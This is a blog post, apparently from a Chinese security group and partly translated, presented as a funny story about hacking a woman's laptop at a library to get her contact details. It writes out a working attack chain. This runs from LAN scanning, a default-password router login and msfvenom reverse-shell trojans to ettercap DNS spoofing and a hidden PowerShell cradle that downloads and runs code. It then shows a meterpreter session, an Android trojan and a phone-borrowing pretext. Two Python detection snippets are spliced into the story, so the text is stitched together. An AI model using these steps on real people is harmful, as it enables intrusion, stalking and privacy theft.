
A tale from our group's guru: "Picking Up a Girl at the Library"

Yeshisan, 1 year ago (2018-09-11)

On the technical content of picking up girls: below, the guru of our group (7717114), Yeshisan, presents "Picking Up a Girl at the Library".

What does a techie shut-in do when he sees a pretty girl and doesn't dare walk up and ask for her contact details? The power of technology.
Although one of the two of us is damn handsome and a real ladies' man, I figured the show-off route was still the way to go.

Background

A great man once said: nobody does anything for no reason.
Briefly, the background: I ran into a girl at the library, and she was very pretty.

As a hopeless shut-in, walking up to flirt was out of the question, so I started thinking about whether there was some other way to get her contact details.

Think about it the normal way: what is on a person's computer? If there is a registration form or something similar on it, wouldn't it contain a phone number, an email address, that kind of contact information???

So our entry point is the computer.

From years of creepy experience, I could tell the girl was a student and that her computer would have that kind of thing on it. (Don't ask me how I know.)

Approach

A personal computer, unlike a server, has no fixed IP address, so the usual penetration-testing playbook can be thrown out. Never mind that there is no fixed IP; even if there were, picking out one IP address among all the IPs in the world is nearly impossible. But the library has free WiFi. Once we connect to that WiFi we are on the same network segment as the girl, so we can probe the internal network for live hosts, find the internal address DHCP handed to her, and then scan its ports and go from there.

First, let's look at the IP address the router's DHCP server assigned to us.

[email protected]:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.123 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe18:1e36 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:18:1e:36 txqueuelen 1000 (Ethernet)
RX packets 34 bytes 2820 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48 bytes 3407 (3.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 20 bytes 1116 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1116 (1.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Our current IP address is 192.168.1.123, so the gateway is 192.168.1.1.
The internal range is .0 to .255, so we just need to scan 0-255 and see which addresses are alive.

[email protected]:~# nmap -sP 192.168.1.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-25 22:35 CST
Nmap scan report for bogon (192.168.1.1)
Host is up (0.0012s latency).
MAC Address: 44:97:5A:A2:CE:FE (Shenzhen Fast Technologies)
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00019s latency).
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Nmap scan report for bogon (192.168.1.103)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.34 seconds

Probing with nmap shows two live hosts, .106 and .103. Note that this is a lab environment I rebuilt to reproduce the story; in reality there were far more than these few IPs. So how do we decide which IP was assigned to the girl?
This could be done by capturing packets, but I picked the simplest and crudest method: peeking at her screen.

Since there were only a handful of people in the library, and the only laptops were ours plus the front desk's computer, peeking at screens seemed the most effective method.

win10 (front desk), win7 (the girl), Kali Linux (me)

So we just need to find out which IP is running Windows 7 to pin down the target.

[email protected]:~# nmap -O 192.168.1.106

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-25 22:37 CST
Nmap scan report for bogon (192.168.1.106)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
902/tcp open iss-realsecure
912/tcp open apex-mesh
MAC Address: A8:1E:84:28:81:6F (Quanta Computer)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|Vista|7|8.1|2008|Longhorn|2016 (96%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows 10 (96%), Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows 10 build 10074 - 10586 (92%), Version 6.1 (Build 7601: Service Pack 1) (92%), Microsoft Windows 10 build 10586 (89%), Microsoft Windows Vista SP2 or Windows 7 Ultimate SP0 - SP1 (89%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (88%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.20 seconds

The final result: the .106 IP is Windows 7. With the -O option, nmap also probes the target's open ports and services, so we can try vulnerabilities in those services, port 445 for example.

I tried exploiting these services with Metasploit, with no result.

I went to the bathroom for a smoke and had a bold idea. If the frontal assault doesn't work, go around it: first generate a trojan with msf, then use DNS hijacking to redirect every site the girl visits to my IP, and lure her into downloading the trojan we generated.

But many routers now have some defensive mechanisms, such as ARP-spoofing protection, so I first had to knock out the router's protections. I opened the router's admin page, typed in the default password, and I was in......... Suddenly I felt my luck was not bad at all. Never mind the details; I simply switched off all of the router's protective mechanisms.

Next, generate an exe trojan.

[email protected]:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -f exe > 1.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

Start Metasploit and listen.
msf > use exploit/multi/handler //load the module
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp //load the payload; it must match the one used to generate the trojan
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options //check the options that need to be set

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123 //set the listening IP address
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 4444 //set the listening port
LPORT => 4444
msf exploit(handler) > run //start listening

Started reverse TCP handler on 192.168.1.123:4444
Starting the payload handler...
Sending stage (1189423 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21435) at 2017-06-25 22:52:03 +0800
Sending stage (1189423 bytes) to 192.168.1.106
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=unknown state: tlsv1 alert protocol version

生成木馬以后,編輯ettercap工具的dns配置文件進行修改。

Vim /etc/ettercap/etter.dns

通配符 代表所有域名
A和PTR后面的就是指向地址,因為使用的是通配符,也就是說當我們開啟劫持以后,目標無論訪問什么樣的站點,最后都會指向到我們kali的這臺機器
修改完以后開啟Apache服務。

Service apache2 start

之后啟動ettercap,關于ettercap如何進行dns欺騙,不懂的可以看這篇文章。
https://blog.csdn.net/hy_696/article/details/74640519
接著把木馬復制到網站的根目錄下

[email protected]:~$ cp test.exe /var/www/html

注意:你可以寫一個html網頁進行偽裝,比如彈出瀏覽器版本過低請安裝最新版本重新訪問之類的話語,然后彈出下載地址。
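The detection-side counterpart of the wildcard A-record trick described above, added here as an example (not the post's own code): a wildcard spoof makes every unrelated name resolve to one LAN address, which is easy to spot in observed DNS answers. The log format and all values below are constructed.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample of observed DNS answers in the shape
# "time client name A address"; not taken from the original post.
SAMPLE_DNS_LOG = """\
22:41:01 192.168.1.106 www.baidu.com A 192.168.1.123
22:41:03 192.168.1.106 mail.qq.com A 192.168.1.123
22:41:07 192.168.1.106 update.microsoft.com A 192.168.1.123
22:41:09 192.168.1.106 cdn.jsdelivr.net A 192.168.1.123
22:41:12 192.168.1.103 www.baidu.com A 110.242.68.3
22:41:15 192.168.1.106 printer.lan A 192.168.1.50
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+A\s+(\S+)$")


def parse_answers(text):
    """Yield (client, name, address) tuples from the constructed log."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            _ts, client, name, addr = m.groups()
            yield client, name, addr


def registrable_parent(name):
    """Crude grouping key: the last two labels, enough to tell unrelated names apart."""
    parts = name.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def find_wildcard_spoofing(text, min_names=3):
    """Return {answer_ip: sorted parent names} for private answer IPs that were
    handed out for at least `min_names` unrelated names. A legitimate resolver
    never maps baidu, qq and microsoft to the same RFC1918 host, so this is a
    strong sign of a '*' A-record spoof on the LAN."""
    names_by_ip = defaultdict(set)
    for _client, name, addr in parse_answers(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue  # skip malformed answers rather than crash the scan
        if ip.is_private:
            names_by_ip[addr].add(registrable_parent(name))
    return {ip: sorted(n) for ip, n in names_by_ip.items() if len(n) >= min_names}
```

A single intranet host (printer.lan above) is never flagged, only an address that absorbs many unrelated names.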

在經歷漫長的等待后,msf還是沒有到來自目標的回話。

我又去窺了一下屏,在妹子電腦的右下角看到了一個熟悉的圖標。

略微有點小尷尬,因為生成的木馬是不免殺的,所以99.99%的幾率可能被360攔截了。所以這里需要把木馬做一下免殺,這里我打算用PowerShell生成一段利用代碼保存為bat文件,再次誘導目標下載。經過測試通過360進行查殺,會顯示為病毒。但實際執行的時候,360就瞎了,不會有任何提示。

msf > use exploit/multi/script/web_delivery //載入模塊
msf exploit(web_delivery) > info //查看需要設置的選項

Name: Script Web Delivery
Module: exploit/multi/script/web_delivery
Platform: Python, PHP, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2013-07-19

Provided by:
Andrew Smith "jakx" <[email protected]>
Ben Campbell <[email protected]>
Chris Campbell

Available targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload information:

Description:
This module quickly fires up a web server that serves a payload. The
provided command will start the specified scripting language
interpreter and then download and execute the payload. The main
purpose of this module is to quickly establish a session on a target
machine when the attacker has to manually type in the command
himself, e.g. Command Injection, RDP Session, Local Access or maybe
Remote Command Exec. This attack vector does not write to disk so it
is less likely to trigger AV solutions and will allow privilege
escalations supplied by Meterpreter. When using either of the PSH
targets, ensure the payload architecture matches the target computer
or use SYSWOW64 powershell.exe to execute x86 payloads on x64
machines.

References:
http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html
http://www.pentestgeek.com/2013/07/19/invoke-shellcode/
http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html

msf exploit(web_delivery) > set URIPATH / //set the URI to the root path
URIPATH => /
msf exploit(web_delivery) > set target 2 //set the type of script to deliver, here PSH (PowerShell)
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp //payload
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > show options //check the settings

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
2 PSH

msf exploit(web_delivery) > set LHOST 192.168.1.123 //set the callback IP
LHOST => 192.168.1.123
msf exploit(web_delivery) > set LPORT 4444 //set the callback port
LPORT => 4444
msf exploit(web_delivery) > run //with the options configured, just run; msf automatically generates a snippet of PowerShell code
Exploit running as background job.
Started reverse TCP handler on 192.168.1.123:4444
Using URL: http://0.0.0.0:8080/
Local IP: http://192.168.1.123:8080/
Server started.
Run the following command on the target machine:
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/'); //the generated PowerShell code

Copy this final PowerShell snippet, save it as a .bat file, and move it into the web root.

powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/');
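The one-liner above is a classic download cradle, and its traits (no profile, hidden window, WebClient download, IEX) are what endpoint detection keys on. The following scorer over process-creation command lines is an added example, not the post's or Metasploit's code; the log lines are constructed, the first one mirroring the cradle shown above.

```python
import re

# Constructed process-creation log, one command line per line.
SAMPLE_PROC_LOG = """\
powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.123:8080/');
PowerShell.exe -NoProfile -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"
powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1
cmd.exe /c dir C:\\Users
"""

# (name, regex, weight). Abbreviated and full parameter names are both
# matched because PowerShell accepts any unambiguous prefix (-nop, -w).
INDICATORS = [
    ("no_profile", re.compile(r"-nop(?:rofile)?\b"), 1),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b"), 2),
    ("webclient", re.compile(r"new-object\s+(?:system\.)?net\.webclient"), 2),
    ("download", re.compile(r"\.download(?:string|data|file)\s*\("), 2),
    ("iex", re.compile(r"\biex\b|invoke-expression"), 3),
    ("http_url", re.compile(r"https?://"), 1),
]


def score_command(cmdline):
    """Return (score, [indicator names]) for one command line; non-PowerShell
    processes score 0 so ordinary cmd.exe activity never trips the rule."""
    text = cmdline.lower()
    if "powershell" not in text and "pwsh" not in text:
        return 0, []
    hits = [name for name, rx, _w in INDICATORS if rx.search(text)]
    score = sum(w for name, _rx, w in INDICATORS if name in hits)
    return score, hits


def find_download_cradles(log_text, threshold=7):
    """Return [(score, cmdline)] for lines scoring at or above threshold.
    The threshold requires IEX plus at least two download/hiding traits,
    so a plain '-File backup.ps1' invocation is not reported."""
    out = []
    for line in log_text.splitlines():
        line = line.strip()
        if line:
            score, _hits = score_command(line)
            if score >= threshold:
                out.append((score, line))
    return out
```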

當目標運行后,成功拿到一個meterpreter回話

msf exploit(web_delivery) > 192.168.1.106 web_delivery - Delivering Payload
Sending stage (957487 bytes) to 192.168.1.106
Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.106:21669) at 2017-06-25 22:59:02 +0800
sessions 1
Starting interaction with 1...

meterpreter >

With this session we can do a lot of things, like search the system for image files and documents; those files may well contain the contact details we want. As for the images... let's not go there...

Through a certain Word file I got the girl's phone number and email, searched for her WeChat via add-friend, compared the profile picture, and emmm, met her gaze: it's really you.

But did you think it ended there?

Although we got her contact details from files on the system, if we could get into her phone too, wouldn't there be even more inside, plus her location via the phone's GPS.... uh... I'll stop there; use your imagination.

Through the internal network we were lucky enough to get what we wanted, but as soon as the girl leaves the library our trojan is useless, because when generating it I set it to connect back to an internal IP address. So we need a server on the public internet to keep long-term control over the girl's phone or computer. I won't repeat how to generate the exe trojan; follow the steps above and swap in the public IP. Now for the phone trojan. Since the girl uses an Android phone, we'll make an Android trojan.

[email protected]:~$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT = 4444 R > test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload

Error: The following options failed to validate: LPORT.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > run

[-] Handler failed to bind to 192.168.1.123:4444:- -
Started reverse TCP handler on 0.0.0.0:4444
Starting the payload handler...

Same old routine: move the trojan into the web root.

Next, my plan was to borrow the girl's phone, browse to the Kali IP address, download the trojan and install it. The question is, how to borrow the phone. I picked up my own phone and pretended to take a call: someone or other had been in a car accident and was about to die, sobbing my eyes out, when suddenly my phone ran out of battery, and then I asked the girl to lend me hers.

emmm, the girl was quite sympathetic...

The buddy next to me was dumbfounded: that actually worked....

Out of boredom and for fun, with no ulterior motives, I told the girl the whole story, and we exchanged WeChat contacts. To this day she still hits me every time she sees me.
